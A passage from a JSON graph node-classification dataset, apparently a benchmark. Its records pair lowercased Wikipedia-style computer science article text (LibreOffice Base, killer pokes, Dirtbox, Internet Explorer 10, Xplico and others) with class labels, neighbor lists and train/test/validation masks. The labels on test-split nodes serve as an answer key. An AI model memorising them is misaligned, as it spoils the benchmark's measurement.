      7211,
      8253,
      1090,
      4180,
      10838,
      10840,
      9312,
      1121,
      7269,
      8806,
      6258,
      10357,
      4220,
      10365,
      10878,
      6783,
      4741,
      8842,
      6283,
      7824,
      147,
      7830,
      6807,
      4258,
      7842,
      7844,
      7869,
      8893,
      8896,
      4807,
      4810,
      1744,
      209,
      3293,
      9952,
      6884,
      6377,
      1772,
      1776,
      10481,
      1290,
      781,
      4879,
      784,
      2839,
      8480,
      10023,
      4910,
      7983,
      11066,
      9022,
      10562,
      8525,
      2388,
      8534,
      3928,
      8540,
      6495,
      8544,
      11629,
      10608,
      9084,
      7549,
      11649,
      3977,
      6539,
      1428,
      6037,
      3483,
      2979,
      11171,
      8109,
      446,
      5058,
      10691,
      1482,
      6608,
      8662,
      9174,
      10199,
      8665,
      9182,
      2023,
      7151,
      5616,
      6130,
      2551,
      2553,
      8700,
      1534
    ],
    "mask": "None"
  },
  {
    "node_id": 6166,
    "label": 1,
    "text": "LibreOffice_Base:libreoffice base libreoffice base free open-source relational database management system part libreoffice office suite libreoffice base built fork openoffice.org first released version 3.4.0.1 october 4 2011 similarly packages libreoffice suite base supported across multiple platforms including microsoft windows macos linux base recognized cross-platform compatibility relative microsoft access developed exclusively windows libreoffice base designed allow users easily create access modify view databases data done providing users graphical user interface allows users work four main tools tables queries forms reports base includes software wizards assist users various aspects program base able work embedded external database files embedded databases stored single file using c++ based firebird java-based hsqldb storage engine connecting external databases base acts graphical user interface front-end facilitate interactions various database systems including microsoft access databases jet odbc/jdbc data sources mysql mariadb postgresql base described unusual project niche database management system software tends toward proprietary software designed enterprise users proprietary database management software costs described reason use base small businesses work ongoing transition embedded storage engine hsqldb firebird sql back-end firebird included libreoffice experimental option since libreoffice 4.2 august 2018 document foundation announced release libreoffice version 6.1 experimental mode used embedded firebird engine support fully available old hsqldb engine deprecated—although still available—and replaced firebird default option february 2019 document foundation released libreoffice version 6.2 embedded firebird engine support moved experimental mode operational firebird migration assistant create backup copy content xml document migration process",
    "neighbors": [
      7523,
      8683,
      6797,
      7022,
      7983,
      9389,
      9455,
      8539,
      10737,
      823,
      5401,
      987,
      9471
    ],
    "mask": "Test"
  },
  {
    "node_id": 6167,
    "label": 4,
    "text": "Killer_poke:killer poke computer jargon killer poke method inducing physical hardware damage machine peripherals insertion invalid values via example basic poke command memory-mapped control register term typically used describe family fairly well known tricks overload analog electronics crt monitors computers lacking hardware sanity checking notable examples ibm portable commodore pet pet-specific killer poke connected architecture machine video rasterizer circuits early pets writing certain value memory address certain i/o register codice_1 made machine able display text screen much faster pet range revamped updated hardware discovered performing old trick new hardware led strange behavior new video chip could possibly damage pet integrated crt monitor commodore 64 optional external 5-1/4 floppy drive commodore 1541 contained 6502 microprocessor used run commodore dos also manage drive mechanism drives stored data 40 tracks 0–39 stepper motor could manually controlled basic print -ing memory-write commands drive correspond poke command basic write drive internal memory i/o registers computer drive either end range track 0 track 39 commanded continue moving software firmware method prevent drive damage continued knocking drive head stop would throw mechanism alignment problem exacerbated copy protection techniques used non-standard disk formats unusual track counts commodore 1571 optical head stop instead mechanical one trs-80 model iii ability switch 32-character-wide display 64-character display actuated relay video hardware accomplished writing specific memory-mapped control register programs repeatedly switched 32- 64-character modes high speed either purpose accidentally could permanently damage video hardware single killer poke demonstrates software failure mode could permanently damage hardware trs-80 color computer ibm pc ibm pcjr nascom msx amstrad cpc bbc micro acorn computers contained built-in relay controlling external tape recorder toggling motor control relay tight loop would reduce relay longevity floppy drive commodore amiga personal computer could made produce noises various pitches making drive heads move back forth program existed could play el cóndor pasa less correctly amiga floppy drive sounds relied head assembly hitting stop gradually sent head alignment certain models lg cd-rom drives specific firmware used abnormal command update firmware clear buffer command usually used cd-rw drives linux uses command tell difference cd-rom cd-rw drives cd-rom drives dependably return error unsupported cd-rw command faulty drives interpreted update firmware causing stop working casual parlance bricked systemd mounts variables used unified extensible firmware interface linux system sysfs writable root user system result possible root user system completely brick system non-conforming uefi implementation specifically msi laptops using codice_2 command delete codice_3 directory recursively delete root directory game boy lcd screen turned game software outside vertical blanking interval damage hardware",
    "neighbors": [
      3843,
      9006,
      5744,
      2226,
      9972,
      823,
      4764
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6168,
    "label": 9,
    "text": "WBEM_Services_Specification:wbem services specification jsr 48 java wbem api specification java specification request developed java community process specifies java language binding dmtf common information model/web-based enterprise management standards jsr 48 expert group completed public review 2006 way create technology compatibility kit order finalize standard api regarded stable jsr 48 requires java platform standard edition java se formerly j2se 7 higher ws jsr-48 api api composed 5 packages ws provides jsr-48 implementation part ws sdk pro ws also uses jsr-48 ws j wbem server wave wbem agent validation environment sblim cim client java adopted jsr 48 api stated openpegasus project use jsr 48 jmpi provider interface although status yet available",
    "neighbors": [
      4960,
      4771,
      3562,
      6511,
      11344,
      1079
    ],
    "mask": "Train"
  },
  {
    "node_id": 6169,
    "label": 4,
    "text": "Zeroday_Emergency_Response_Team:zeroday emergency response team computer security zeroday emergency response team zert group volunteer security researchers produced emergency patches zero day attack vulnerabilities proprietary software came public notice late september 2006 patch month vector markup language vulnerability microsoft later producing patch older versions microsoft windows longer supported microsoft team included several members prominent antivirus network security work manifesto states zert members work together team release non-vendor patch so-called 0day zero-day exploit appears open poses serious risk public infrastructure internet purpose zert crack products rather uncrack averting security vulnerabilities widely exploited zert website updated since april 2007 group presumed inactive",
    "neighbors": [
      3944,
      6797,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 6170,
    "label": 4,
    "text": "Dirtbox_(cell_phone):dirtbox cell phone dirtbox drt box cell site simulator phone device mimicking cell phone tower creates signal strong enough cause nearby dormant mobile phones switch mounted aircraft used united states marshals service locate collect information cell phones believed connected criminal activity also used jam phones device name comes company developed digital receiver technology inc. drt owned boeing company boeing describes device hybrid jamming managed access detection similar device smaller range controversial stingray phone tracker widely used u.s. federal entities including federal bureau investigation fbi known drt first manufactured dirtbox company publicly advertise stating web site due sensitive nature work unable publicly advertise many products wall street journal wrote u.s marshals service program utilizing device fully matured 2007 boeing bought drt 2008 similar devices harris corporation like stingray phone tracker sold around time since 2008 airborne mounting kit cell phone surveillance said cost 9,000 june 11 2010 boeing company asked national telecommunications information administration advise united states congress ... communications act 1934 modified allow prison officials state local law enforcement use appropriate cell phone management suggested special weapons tactics swat teams paramilitary tactical units could use devices control wireless communications raids chicago police department bought dirtboxes eavesdrop demonstrators 2012 nato summit used 2014 black lives matter demonstrations 2015 became known los angeles police department purchased devices device described size mimic cell phone tower utilizes imsi-catcher international mobile subscriber identity technology phone services use identify individual subscribers emits pilot signal made appear stronger nearest cell tower causing phones within range broadcast imsi numbers electronic serial numbers esn encryption prevent process devices retrieve phone encryption session keys less one second success rates 50–75 real world conditions aircraft-mounted device locate phone within 10 feet another source claims triangulating flights dirtbox pinpoint phone location two feet dirtbox hybrid detection managed access jamming technologies according wall street journal people knowledge program determine phones belong suspects non-suspects cell phones interest belonging prison personnel commercial users area returned local network also selectively interrupt prevent calls certain phones used block unauthorized phone use prison inmates also retrieve data phones according boeing technology unobtrusive legitimate wireless communications bypasses phone companies operations u.s marshals service technical operations group used device fixed manned airplanes track fugitives said deploy targets requested parts justice program devices operated least five u.s. airports covering u.s. population unclear whether u.s marshals service requests court orders use devices marshals service used dirtboxes mexican drug war tracking fugitives coordination mexico naval infantry force flights guatemala dirtboxes also used united states special operations command drug enforcement administration fbi u.s. customs border protection according procurement documents u.s. navy bought dirtboxes mount drones naval air weapons station china lake research development facility southern california pentagon washington headquarters services bought dirtboxes 2011 based references drtbox nsa boundless informant screenshots leaked edward snowden dirtboxes probably used nsa 2013 french newspaper lemonde wrote thanks drtbox 62.5 million phone data collected france united states naval special warfare development group group one bought digital receiver technology 1301b system april 2 2007 25,000 according united states government procurement web site national telecommunications information administration ntia known dirtboxes since least 2010 2014 united states department justice refused confirm deny government agencies used official said would utterly false conflate law-enforcement program collection bulk telephone records national security agency federal communications commission responsible licensing regulating cell-service providers aware dirtbox activity prior wall street journal exposé january 2015 us senate judiciary committee asked department justice department homeland security law enforcement agencies used drtboxes specify legal processes policies existed protect privacy whose information collected privacy advocates including u.s. rep. alan grayson d-florida criticized dirtbox use violation fourth amendment united states constitution brian owsley law professor indiana institute technology former united states magistrate said use devices legally think government would need obtain search warrant based probable cause consistent fourth amendment guardian quoted michael german professor new york university law school former fbi agent saying overriding problem excessive secrecy hides government ’ ever-expanding surveillance programs public accountability senator edward markey d-massachusetts former senator al franken d-minnesota warned americans privacy rights must assured",
    "neighbors": [
      3495,
      1070,
      7887,
      3088,
      8849
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6171,
    "label": 2,
    "text": "Internet_Explorer_10:internet explorer 10 internet explorer 10 ie10 tenth version internet explorer web browser released microsoft 2012 default browser windows 8 ie10 expands internet explorer 9 functionality regard css3 support hardware acceleration html5 support windows 8 divided two editions different user interfaces metro app support plug-ins traditional desktop application retains plug-in support 64-bit computers metro edition runs 64-bit mode default desktop edition run 64-bit mode enabling enhanced protected mode april 12 2011 microsoft released first ie10 platform preview runs windows 7 later second platform preview also available windows 7 later next four platform previews ran windows 8 first preview release came four weeks final release internet explorer 9 ie10 reached general availability september 4 2012 component windows server 2012 preview ie10 windows 7 made available download november 2012 february 26 2013 internet explorer 10 made available download windows 7 sp1 users january 12 2016 support ended ie10 windows operating systems capable running internet explorer 11 due new support policies dictating newest version ie available supported version windows supported ie10 supported windows server 2012 windows embedded 8 standard internet explorer 10 reach end support january 31 2020 ie 11 supported version internet explorer windows server 2012 windows embedded 8 standard ie 11 available piloting starting spring 2019 internet explorer 10 first announced april 12 2011 mix 11 conference las vegas conference microsoft showcased demo version internet explorer 10 along demo version windows 8 day platform preview internet explorer 10 released microsoft internet explorer test drive website supports windows 7 later platform previews support windows 8 internet explorer 10 platform preview 1 supports css3 grid layout css3 flexible box layout css3 multi-column layout css3 gradient full hardware acceleration reviewers responses release internet explorer 10 platform preview varied however noted soon 29 days release internet explorer 9 microsoft began talking next version reisinger eweek listed requested features next version michael muchmore pc magazine tested platform preview 1 performance html5 support microsoft third parties test suites test platform preview 1 performed better internet explorer 9 always better competing web browsers september 13 2011 microsoft released developer preview windows 8 general public came internet explorer developer preview first full browser incarnation internet explorer 10 although internet explorer last major web browser – among mozilla firefox google chrome opera safari – support spell checking first desktop browser windows support autocorrection internet explorer 10 released manufacturing along windows 8 windows server 2012 latter reached general availability september 4 2012 former reached general availability october 26 2012 preview internet explorer 10 windows 7 windows server 2008 r2 released november 13 2012 compatible previous versions windows windows 8 internet explorer 10 includes built-in adobe flash player microsoft adobe worked together ensure version adobe flash included internet explorer 10 drain battery impact performance negative ways metro version internet explorer features adobe flash included battery life performance security purposes features work well touch also removed metro version internet explorer however originally websites use adobe flash metro version internet explorer microsoft adobe maintain list approved websites reportedly video content games desktop version internet explorer 10 features adobe flash available march 12 2013 microsoft changed behavior allowing sites whitelist display flash content allowing sites display flash content except curated compatibility view cv list blacklist maintained microsoft desktop version internet explorer 10 available windows 7 windows 8 retains user interface ui internet explorer 9 minor refinements removing gradients metro version internet explorer 10 available windows 8 includes new ui hidden webpage viewed takes entire screen ui revealed right click mouse swipe top bottom edges touchscreen ui shown tabs listed top screen small preview webpage tab button add new tab placed top-right corner bottom screen address bar navigational buttons shown navigational buttons include back button navigate previous page refresh button reload active page pin button create new shortcut tile active page start screen wrench-shaped icon opens menu ie10 contains options view desktop opens current webpage desktop version internet explorer 10 find page find text string word phrase arbitrary set letters active page internet explorer 10 also introduces new feature called flip ahead works metro desktop versions internet explorer 10 allows users move articles span multiple pages well search results web pages next page similar button feature turned default user browsing history sent microsoft order provide feature according windows supersite microsoft said sites may need updated ensure work intended internet explorer 10 longer features supports following windows phone developer summit june 2012 joe belfiore announced windows phone 8 due towards end 2012 include mobile version internet explorer 10 offers four times faster javascript performance two times support html 5 features includes microsoft smartscreen supports touch html5 apps internet explorer 10 new user agent string following general format depending system different parts user string may change last token touch appears systems equipped touchscreen platform token may following",
    "neighbors": [
      6657,
      9736,
      2579,
      7708,
      9757,
      7713,
      10791,
      9770,
      10282,
      559,
      4661,
      3639,
      10808,
      64,
      5707,
      9808,
      10834,
      6231,
      8281,
      2139,
      603,
      6747,
      9834,
      1642,
      9328,
      115,
      9843,
      119,
      4728,
      637,
      1664,
      5765,
      6797,
      10910,
      8351,
      7340,
      9908,
      11449,
      4797,
      7364,
      11466,
      7885,
      4310,
      2777,
      8923,
      11487,
      737,
      4326,
      9448,
      4331,
      9964,
      4844,
      8443,
      5380,
      7943,
      1807,
      790,
      3350,
      7965,
      11559,
      1834,
      10026,
      7983,
      11060,
      10057,
      11112,
      4972,
      8557,
      6528,
      3971,
      3462,
      8584,
      9609,
      5004,
      6028,
      7572,
      5026,
      11683,
      5054,
      7106,
      9167,
      4048,
      5078,
      11223,
      10722,
      5605,
      487,
      8169,
      494,
      1520,
      7152,
      6133,
      5114
    ],
    "mask": "None"
  },
  {
    "node_id": 6172,
    "label": 4,
    "text": "NetTransformer:nettransformer nettransformer cross-platform network discovery program software created idea discovering set snmp queries ip networks state produce various data models use data models inputs transform network one state another per original phd author used nettransformer demonstrate network transformation isp network ipv4 ipv6 state transformation long lasting process typically driven strategy passes many states example initial state current state network services offered ipv4 long term goal network service ipv6 achieve isp pass many intermediate states depending transformation strategy network mapping perspective nettransformer generates 3 distinct data models software generating topology views network topology diff views network centric data model thus lot people use simply network mapping one important concepts network treated separate project since many kinds networks years appeared various kinds project types example free graph working kind graph using rest diff visualization capabilities software",
    "neighbors": [
      4005,
      2085,
      5677,
      6797,
      7983,
      823,
      5469,
      5470
    ],
    "mask": "Test"
  },
  {
    "node_id": 6173,
    "label": 3,
    "text": "Snail_Maze:snail maze snail maze 1986 video game sega part sega master system instead released cartridge built system bios could played starting system without game cartridge inserted holding buttons 1 2 simultaneously later console models included minimal bios memory constraints snail maze removed systems instead included built alex kidd miracle world sonic hedgehog snail maze never released cartridge card format simple game snail maze involves navigating small orange snail yellow shell blue maze goal area clearly marked players must attempt reach within time limit despite relative simplicity compared games era snail maze could quite challenging subsequent levels reduce time available giving progressively lower margin error snail maze fans worked keep game becoming obscure footnote video game history example 2004 port snail maze made japanese msx computer platform port included enhanced graphics well new title screen version snail maze included coleco sonic handheld system created 2006 port snail maze released december 2015 ti-84 plus ce graphing calculator written ez80 assembly language james vernon",
    "neighbors": [
      1515,
      9006
    ],
    "mask": "Test"
  },
  {
    "node_id": 6174,
    "label": 0,
    "text": "Manually_Annotated_Sub-Corpus:manually annotated sub-corpus masc balanced subset 500k words written texts transcribed speech drawn primarily open american national corpus oanc oanc 15 million word growing corpus american english produced since 1990 public domain otherwise free usage redistribution restrictions masc includes manually validated annotations logical structure headings sections paragraphs etc sentence boundaries three different tokenizations associated part speech tags shallow parse noun verb chunks named entities person location organization date time penn treebank syntax additional manually produced validated annotations produced masc project portions sub-corpus including full-text annotation framenet frame elements 100k+ sentence corpus wordnet 3.1 sense tags one-tenth also annotated framenet frame elements annotations portions sub-corpus wide variety linguistic phenomena contributed projects including propbank timebank mpqa opinion several others co-reference annotations clause boundaries entire masc corpus scheduled released end 2016 wordnet sense annotations occurrences 114 words also included masc distribution well framenet annotations 50-100 occurrences 114 words sentences wordnet framenet annotations also distributed part masc sentence corpus unlike freely available corpora including wide variety linguistic annotations masc contains balanced selection texts broad range genres present masc includes seventeen different types linguistic annotation production ** currently available original format masc annotations whether contributed produced in-house transduced graph annotation format graf defined iso tc37 sc4 ’ linguistic annotation framework laf online tool anc2go transduce annotations parts masc several formats including conll iob format formats use uima general architecture text engineering masc open data resource used anyone purpose time collaborative community resource sustained community contributions annotations derived data freely downloadable masc download page linguistic data consortium masc also distributed part-of-speech-tagged form natural language toolkit",
    "neighbors": [
      416,
      5667,
      8323,
      5639,
      9577
    ],
    "mask": "Test"
  },
  {
    "node_id": 6175,
    "label": 3,
    "text": "LGA_771:lga 771 lga 771 also known socket j cpu interface introduced intel 2006 used intel core microarchitecture netburst microarchitecture dempsey based dp-capable server processors dual-core xeon codenamed dempsey woodcrest wolfdale quad-core processors clovertown harpertown yorkfield-cl also used core 2 extreme qx9775 succeeded lga 1366 nehalem-based xeon processors name implies land grid array 771 contacts word socket instance misnomer processor interface pin holes instead 771 protruding lands touch contact points underside microprocessor j socket j refers now-canceled processor codenamed jayhawk expected debut alongside interface intended successor socket 604 takes much design lga 775 almost pin compatible lga 775 socket 771 cpus rotated 90 degrees two pins swapped small adapters developed chinese computer diy enthusiasts available allow lga 771 cpus installed lga 775 motherboards bios microcode supports also able add supportion microcode manually",
    "neighbors": [
      3588,
      9611,
      5901,
      5523,
      2455,
      3992,
      3352,
      8855,
      3995,
      4252,
      11417,
      7714,
      10019,
      4523,
      2604,
      2350,
      6192,
      9649,
      4537,
      7105,
      6339,
      4805,
      7110,
      8394,
      3403,
      4427,
      4179,
      3798,
      4185,
      7002,
      9945,
      11484,
      9570,
      10468,
      613,
      8552,
      7657,
      1260,
      4717,
      10225,
      371,
      9592,
      8442
    ],
    "mask": "Test"
  },
  {
    "node_id": 6176,
    "label": 7,
    "text": "Koding:koding koding development environment automation platform owned koding inc. allows software developers define development environments definition file called stack script file calls various cloud providers provision defined development environment file visible entire team updated administrators account environments provisioned file shared web browser without needs downloading software development kits developers also able download command line tool called kd allows mount provisioned vms computers thus enabling development using developers local ides since platform able create linux vms supports multiple programming languages including c c++ go java node.js perl php python ruby name=ram 2009 kodingen predecessor koding launched included features koding today later application temporarily closed development resulted koding first version koding launched 16 january 2012 private beta public beta began 24 july 2012 final beta version single developer version released public 7 august 2013 march 2016 koding released teams version geared towards enterprises teams developers koding received 20m date khosla ventures series b matrix partners series rtp ventures greycroft partners seed funding koding via environment definition files able create resources cloud providers developers able write code created resources",
    "neighbors": [
      8068,
      3462,
      8582,
      1802,
      6154,
      1435,
      9245,
      1698,
      5677,
      1203,
      438,
      4920,
      1470,
      7871,
      8644,
      8262,
      339,
      4056,
      9560,
      9561,
      11357,
      735,
      8289,
      482,
      10854,
      8554,
      9195,
      5101,
      10991,
      10744,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 6177,
    "label": 4,
    "text": "Xplico:xplico xplico network forensics analysis tool nfat software reconstructs contents acquisitions performed packet sniffer e.g wireshark tcpdump netsniff-ng unlike protocol analyzer whose main characteristic reconstruction data carried protocols xplico born expressly aim reconstruct protocol application data able recognize protocols technique named port independent protocol identification pipi name xplico refers latin verb explico significance xplico free open-source software subject requirements gnu general public license gpl version 2 clarify xplico imagine raw data ethernet ppp web navigation http protocol case xplico able extract reconstruct web pages contents images files cookies similarly xplico able reconstruct e-mail exchanged imap pop smtp protocols among protocols xplico identifies reconstructs voip msn irc http imap pop smtp ftp xplico software architecture provides output module xplico different user interfaces fact used command line web user interface called xplico interface protocol dissector modules decoding individual protocol protocol dissector reconstruct extract data protocol modules plug-in configuration file loaded execution program allows focus decoding want decode voip calls web traffic configure xplico load rtp sip modules excluding http module another feature xplico ability process reconstruct huge amounts data able manage pcap files multiple gigabytes even terabytes multiple capture probes simultaneously thanks use various types input modules pcap files uploaded many ways directly xplico web user interface sftp transmission channel called pcap-over-ip features xplico used contexts lawful interception network forensics xplico also specific version called pcap2wav able decode voip calls based rtp protocol sip h323 mgcp skinny supports decodidica audio codecs g711ulaw g711alaw g722 g729 g723 g726 msrta microsoft real-time audio examples assumed eth0 used network interface xplico -m rltm -i eth0 xplico -m pcap -f example.pcap xplico -m pcap -d /path/dir/ cases data decoded stored directory named xdecode parameter -m select input module type input module named rltm acquires data directly network interface vice versa input module named pcap acquires data form pcap files directory xplico installed default major distributions digital forensics penetration testing",
    "neighbors": [
      2437,
      10271,
      7968,
      5284,
      9381,
      1064,
      7337,
      1580,
      11182,
      7983,
      4789,
      9909,
      823,
      8635,
      2494,
      830,
      7364,
      8644,
      6345,
      842,
      6475,
      4049,
      5843,
      9939,
      9440,
      4834,
      5475,
      7525,
      614,
      9319,
      8554,
      8432,
      381,
      2292,
      2045
    ],
    "mask": "Train"
  },
  {
    "node_id": 6178,
    "label": 2,
    "text": "Palm_Pixi:palm pixi palm pixi pixi plus multimedia smartphones developed palm purchased 2010 hp device viewed successor palm centro smartphone palm second webos device palm pre phones considered smallest smartphone market able browse internet access facebook social media sites well online banking original pixi announced september 8 2009 palm official blog released november 15 2009 sprint carrier network u.s pixi plus announced ces 2010 plus versions include wifi ability act 3g mobile hotspot sometimes known mifi phone released january 7 2010 verizon wireless carrier network subsequently mobility released may 28 2010 o2 united kingdom pixi touch screen capability qwerty keyboard access battery interior hardware phone metal faceplate sits plastic backing palm inc. detailed specifications palm pixi company product web page according information given pixi features 2.63-inch capacitive touchscreen 18-bit color 320x400 screen resolution sub-hvga display device weighs 92.5 grams 3.51 ounces 55.0 mm 2.17 inches width 111.0 mm 4.37 inches height 10.85 mm 0.43 inches thick board radios include gps dual-band cdma2000 3g evdo rev data networking e-mail supports microsoft exchange services direct push well pop3 imap yahoo mail gmail aol microsoft outlook messaging features include im sms mms features 2 megapixel camera led flash proximity sensor accelerometer bluetooth 2.1 a2dp stereo microusb connector 3.5 mm headphone jack 8 gigabytes flash memory roughly 7 gigabytes available user like palm pre pixi features webos includes over-the-air synergy synchronization pixi plus display pixi hardware specs include qualcomm msm7627 600mhz cpu adreno 200 graphics 8gb storage 256 mb ram 802.11 b/g wifi bluetooth 2.1 capable using hsdpa 3.6 mbit/s well gprs offers a-gps navigation location services battery changeable 1,150 mah unit 5.5h talk time 2g 350h standby according manufacturer camera 2 megapixel device rear led flash",
    "neighbors": [
      1537,
      3585,
      4609,
      2308,
      10500,
      6790,
      9863,
      5384,
      3340,
      1682,
      2962,
      405,
      3606,
      8982,
      10393,
      5019,
      5164,
      9266,
      9013,
      694,
      1849,
      1083,
      1728,
      7492,
      10820,
      5318,
      11337,
      5963,
      9163,
      9037,
      2258,
      2259,
      1621,
      6618,
      5339,
      2784,
      4449,
      4832,
      3300,
      9964,
      2285,
      9581,
      10606,
      1776,
      2420,
      8952,
      10109,
      9598,
      8319
    ],
    "mask": "Test"
  },
  {
    "node_id": 6179,
    "label": 2,
    "text": "Catamount_(operating_system):catamount operating system catamount operating system supercomputers catamount lightweight kernel provides basic functionality aims efficiency roots catamount go back 1991 sunmos developed sandia national laboratories university new mexico lightweight operating system cray xt3 uses catamount compute nodes linux server nodes case study ieee assessed performance particle transport code awe cray xt3 8,000-core supercomputer running images catamount cray linux environment cle operating systems work demonstrated running number small benchmarks test machine possible speculate performance impact upgrading one operating system another system whole study findings allows researchers minimise system downtime exploring software-system upgrades results show benchmark tests run less 256 cores would suggest impact upgrading operating system cle less 10",
    "neighbors": [
      3328,
      1795,
      1480,
      7432,
      10411,
      7983,
      1168,
      8242,
      6675,
      823
    ],
    "mask": "None"
  },
  {
    "node_id": 6180,
    "label": 3,
    "text": "Linux_kernel_interfaces:linux kernel interfaces linux kernel provides several interfaces user-space applications used different purposes different properties design two types application programming interface api linux kernel confused kernel–user space api kernel internal api linux api kernel–user space api allows programs user space access system resources services linux kernel composed system call interface linux kernel subroutines gnu c library glibc focus development linux api provide usable features specifications defined posix way reasonably compatible robust performant provide additional useful features defined posix kernel–user space apis systems implementing posix api also provide additional features defined posix linux api choice kept stable decades never breaks stability guarantees portability source code time linux kernel developers historically conservative meticulous introducing new system calls much available free open-source software written posix api since much development flows linux kernel compared posix-compliant combinations kernel c standard library linux kernel api augmented additional features far additional features provide technical advantage programming linux api preferred posix-api well-known current examples udev systemd weston people lennart poettering openly advocate prefer linux api posix api offers advantages fosdem 2016 michael kerrisk explained perceived issues linux kernel user-space api describing contains multiple design errors non-extensible unmaintainable overly complex limited purpose violation standards inconsistent mistakes fixed would break abi kernel presents user space system call interface denomination entirety implemented available system calls kernel various subsystems e.g drm define system calls entirety called system call interface various issues organization linux kernel system calls publicly discussed issues pointed andy lutomirski michael kerrisk others gnu c library wrapper around system calls linux kernel combination linux kernel system call interface glibc builds linux api unix-like systems additional capabilities linux kernel exist part posix drm paramount development implementations well-defined performant free open-source graphics device drivers without rendering acceleration would available even worse 2d drivers would available x.org server drm developed linux since ported operating systems well term linux abi refers kernel–user space abi application binary interface refers compiled binaries machine code abi therefore bound instruction set defining useful abi keeping stable less responsibility linux kernel developers developers gnu c library task linux distributions independent software vendor isvs wish sell provide support proprietary software binaries single linux abi opposed supporting multiple linux abis abi defined every instruction set x86 x86-64 mips armv7-a 32-bit armv8-a 64-bit etc endianness supported able compile software different compilers definitions specified abi achieve full binary compatibility compilers free open-source software e.g gnu compiler collection llvm/clang end-users fact interested linux api windows api abis lot kernel-internal apis subsystems interface one another kept fairly stable guarantee stability case new research insights make change seem favorable api changed necessary rewrite testing done author linux kernel monolithic kernel hence device drivers kernel components ease burden companies maintaining proprietary device drivers out-of-tree stable apis device drivers repeatedly requested linux kernel developers repeatedly denied guaranteeing stable in-kernel apis device drivers guaranteeing would faltered development linux kernel past would still future due nature free open-source software necessary ergo choice linux kernel stable in-kernel api since stable in-kernel apis stable in-kernel abis several use cases linux api considered low-level higher abstraction apis used course still need work top low-level linux apis examples",
    "neighbors": [
      4616,
      3082,
      5139,
      6675,
      7187,
      10776,
      25,
      10780,
      4637,
      10785,
      9762,
      6180,
      5158,
      7217,
      8242,
      9266,
      9784,
      10809,
      2109,
      576,
      4161,
      7234,
      8772,
      6213,
      8268,
      589,
      593,
      10333,
      1632,
      97,
      6244,
      5222,
      10856,
      8298,
      4207,
      9839,
      7285,
      9335,
      2168,
      5754,
      1147,
      5244,
      3197,
      4734,
      1150,
      11391,
      642,
      2179,
      7812,
      10883,
      1676,
      6797,
      4238,
      7821,
      10382,
      2195,
      3734,
      2711,
      6296,
      6808,
      9366,
      9882,
      6813,
      1694,
      7325,
      9887,
      2723,
      8364,
      3248,
      6837,
      10933,
      5815,
      5822,
      5824,
      9921,
      8388,
      1736,
      2762,
      9932,
      8909,
      5840,
      6352,
      7382,
      8410,
      10971,
      4831,
      8928,
      1761,
      1253,
      2278,
      233,
      7403,
      5356,
      9964,
      10480,
      10482,
      5363,
      2294,
      8438,
      8439,
      2809,
      2811,
      7421,
      10499,
      4360,
      1291,
      1804,
      4367,
      273,
      11539,
      5397,
      792,
      10016,
      295,
      2345,
      7983,
      823,
      6968,
      4409,
      7992,
      7483,
      318,
      2368,
      11075,
      3911,
      4423,
      6988,
      10063,
      5457,
      11601,
      5975,
      11095,
      10590,
      8551,
      10091,
      5492,
      7540,
      8573,
      1406,
      8066,
      900,
      2949,
      394,
      3978,
      5514,
      4493,
      7057,
      11667,
      9621,
      1431,
      8602,
      8092,
      11678,
      7584,
      1444,
      421,
      1445,
      935,
      9637,
      4521,
      4011,
      1456,
      11184,
      1972,
      6075,
      6078,
      9151,
      9667,
      8136,
      457,
      2529,
      6625,
      8676,
      2021,
      1513,
      3055,
      6128,
      5105,
      499,
      2036,
      5619,
      5620,
      8186,
      10235,
      2044,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 6181,
    "label": 3,
    "text": "Instruction_unit:instruction unit instruction unit iu also called instruction fetch unit ifu instruction issue unit isu central processing unit cpu responsible organising program instructions fetched memory executed appropriate order part control unit turn part cpu simplest style computer architecture instruction cycle rigid runs exactly specified programmer instruction fetch part cycle value instruction pointer ip register address next instruction fetched value placed address bus sent memory unit memory unit returns instruction address latched instruction register ir value ip incremented over-written new value case jump branch instruction ready next instruction cycle becomes lot complicated though performance-enhancing features added instruction pipelining out-of-order execution even introduction simple instruction cache",
    "neighbors": [
      7173,
      9739,
      7699,
      5655,
      27,
      10781,
      8231,
      7218,
      2623,
      2113,
      7234,
      3142,
      2638,
      1122,
      3175,
      8815,
      630,
      8822,
      7313,
      6815,
      8352,
      5793,
      6818,
      6821,
      7852,
      9391,
      7858,
      9911,
      8890,
      4286,
      2241,
      2243,
      6339,
      9932,
      5329,
      10966,
      731,
      7911,
      10985,
      9964,
      5358,
      1776,
      8944,
      757,
      2805,
      10485,
      249,
      1798,
      6926,
      6415,
      1298,
      1309,
      6950,
      9003,
      309,
      8501,
      5948,
      4928,
      8514,
      6476,
      7505,
      9044,
      11604,
      8543,
      1376,
      10603,
      4465,
      372,
      1399,
      7033,
      1402,
      3457,
      398,
      3470,
      5523,
      9126,
      10669,
      7598,
      1967,
      2480,
      10675,
      1461,
      1463,
      7607,
      4030,
      3014,
      466,
      1499,
      1502,
      5090,
      995,
      9707,
      10734,
      6639,
      499,
      4596,
      8700
    ],
    "mask": "None"
  },
  {
    "node_id": 6182,
    "label": 9,
    "text": "Grammar-oriented_programming:grammar-oriented programming grammar-oriented programming gop grammar-oriented object design good good designing creating domain-specific programming language dsl specific business domain good used drive execution application used embed declarative processing logic context-aware component cac context-aware service cas good method creating maintaining dynamically reconfigurable software architectures driven business-process architectures business compiler used capture business processes within real-time workshops various lines business create executable simulation processes used instead using one dsl entire programming activity good suggests combination defining domain-specific behavioral semantics conjunction use traditional general purpose programming languages",
    "neighbors": [
      9345,
      2374,
      9926,
      9224,
      7851,
      1591,
      2680,
      5081,
      10042,
      1051
    ],
    "mask": "None"
  },
  {
    "node_id": 6183,
    "label": 3,
